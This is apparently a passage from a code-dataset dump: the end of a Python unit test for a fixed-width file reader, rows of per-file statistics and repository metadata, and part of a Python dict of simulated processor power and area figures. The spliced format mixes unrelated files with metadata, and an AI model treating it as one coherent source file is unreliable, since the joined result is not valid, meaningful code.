            expected_rows = list(csv_reader)
        names, rows = self._read_fixed(fixed.Reader)
        self.assertEqual(expected_header, names)
        self.assertEqual(expected_rows, rows)

    def test_reader_func(self):
        with open('examples/testfixed_converted.csv') as f:
            csv_reader = csv.reader(f)
            expected_header = next(csv_reader)
            expected_rows = list(csv_reader)
        names, rows = self._read_fixed(fixed.reader)
        self.assertEqual(expected_header, names)
        self.assertEqual(expected_rows, rows)

    def test_dict_reader(self):
        with open('examples/testfixed_converted.csv') as f:
            csv_reader = csv.DictReader(f)
            expected_rows = list(csv_reader)
            expected_header = csv_reader.fieldnames
        names, rows = self._read_fixed(fixed.DictReader)
        self.assertEqual(expected_header, names)
        self.assertEqual(expected_rows, rows)
| 34.076923
| 72
| 0.642777
| 221
| 1,772
| 4.923077
| 0.167421
| 0.090993
| 0.132353
| 0.206801
| 0.829963
| 0.829963
| 0.829963
| 0.829963
| 0.829963
| 0.782169
| 0
| 0.00077
| 0.26693
| 1,772
| 51
| 73
| 34.745098
| 0.836798
| 0.011287
| 0
| 0.578947
| 0
| 0
| 0.135351
| 0.104512
| 0
| 0
| 0
| 0
| 0.157895
| 1
| 0.078947
| false
| 0
| 0.105263
| 0
| 0.210526
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7aa8cc92b1f1750f6ec2545abff7dd84f35f1060
| 68,566
|
py
|
Python
|
benchmarks/SimResults/micro_pinned_train_combos_splash/cmpD_choleskybarnesfftwater.sp/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
benchmarks/SimResults/micro_pinned_train_combos_splash/cmpD_choleskybarnesfftwater.sp/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
benchmarks/SimResults/micro_pinned_train_combos_splash/cmpD_choleskybarnesfftwater.sp/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
power = {'BUSES': {'Area': 1.33155,
'Bus/Area': 1.33155,
'Bus/Gate Leakage': 0.00662954,
'Bus/Peak Dynamic': 0.0,
'Bus/Runtime Dynamic': 0.0,
'Bus/Subthreshold Leakage': 0.0691322,
'Bus/Subthreshold Leakage with power gating': 0.0259246,
'Gate Leakage': 0.00662954,
'Peak Dynamic': 0.0,
'Runtime Dynamic': 0.0,
'Subthreshold Leakage': 0.0691322,
'Subthreshold Leakage with power gating': 0.0259246},
'Core': [{'Area': 32.6082,
'Execution Unit/Area': 8.2042,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.204603,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.363393,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 1.11055,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.122718,
'Execution Unit/Instruction Scheduler/Area': 2.17927,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.328073,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.00115349,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.20978,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.635775,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.017004,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00962066,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00730101,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 1.00996,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00529112,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 2.07911,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 1.10093,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0800117,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0455351,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 4.84781,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.841232,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.000856399,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.55892,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.631416,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.0178624,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00897339,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 2.36812,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.114878,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.0641291,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.458173,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 7.7797,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.209808,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0230473,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.243032,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.170449,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.45284,
'Execution Unit/Register Files/Runtime Dynamic': 0.193497,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0442632,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00607074,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.643318,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 1.59116,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.0920413,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0345155,
'Execution Unit/Runtime Dynamic': 4.92155,
'Execution Unit/Subthreshold Leakage': 1.83518,
'Execution Unit/Subthreshold Leakage with power gating': 0.709678,
'Gate Leakage': 0.372997,
'Instruction Fetch Unit/Area': 5.86007,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00238064,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00238064,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00206893,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000798397,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00244852,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00927873,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.02299,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0590479,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.163857,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 6.43323,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.47197,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.556533,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 8.96874,
'Instruction Fetch Unit/Runtime Dynamic': 1.22463,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932587,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.408542,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0733521,
'L2/Runtime Dynamic': 0.0149759,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80969,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 6.49788,
'Load Store Unit/Data Cache/Runtime Dynamic': 2.53945,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0351387,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.170198,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.170198,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 7.30486,
'Load Store Unit/Runtime Dynamic': 3.549,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.419679,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.839358,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591622,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283406,
'Memory Management Unit/Area': 0.434579,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.148946,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.15004,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00813591,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.399995,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0773917,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.815992,
'Memory Management Unit/Runtime Dynamic': 0.227432,
'Memory Management Unit/Subthreshold Leakage': 0.0769113,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0399462,
'Peak Dynamic': 29.5043,
'Renaming Unit/Area': 0.369768,
'Renaming Unit/FP Front End RAT/Area': 0.168486,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00489731,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 3.33511,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.731972,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0437281,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.024925,
'Renaming Unit/Free List/Area': 0.0414755,
'Renaming Unit/Free List/Gate Leakage': 4.15911e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0401324,
'Renaming Unit/Free List/Runtime Dynamic': 0.041318,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000670426,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000377987,
'Renaming Unit/Gate Leakage': 0.00863632,
'Renaming Unit/Int Front End RAT/Area': 0.114751,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.00038343,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.86945,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.317832,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00611897,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00348781,
'Renaming Unit/Peak Dynamic': 4.56169,
'Renaming Unit/Runtime Dynamic': 1.09112,
'Renaming Unit/Subthreshold Leakage': 0.070483,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0362779,
'Runtime Dynamic': 11.0287,
'Subthreshold Leakage': 6.21877,
'Subthreshold Leakage with power gating': 2.58311},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0588041,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.248876,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.376591,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.287381,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.463534,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.233977,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.984892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.270943,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.9829,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0711461,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.012054,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.106781,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.089147,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.177927,
'Execution Unit/Register Files/Runtime Dynamic': 0.101201,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.239662,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.59396,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 2.33431,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00183336,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00183336,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00161558,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.00063566,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.0012806,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.0065629,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.016909,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0856993,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 5.45121,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.280368,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.291073,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 7.93428,
'Instruction Fetch Unit/Runtime Dynamic': 0.680612,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0327293,
'L2/Runtime Dynamic': 0.0134497,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 3.28732,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.01348,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0663288,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0663288,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 3.60054,
'Load Store Unit/Runtime Dynamic': 1.40692,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.163555,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.327111,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
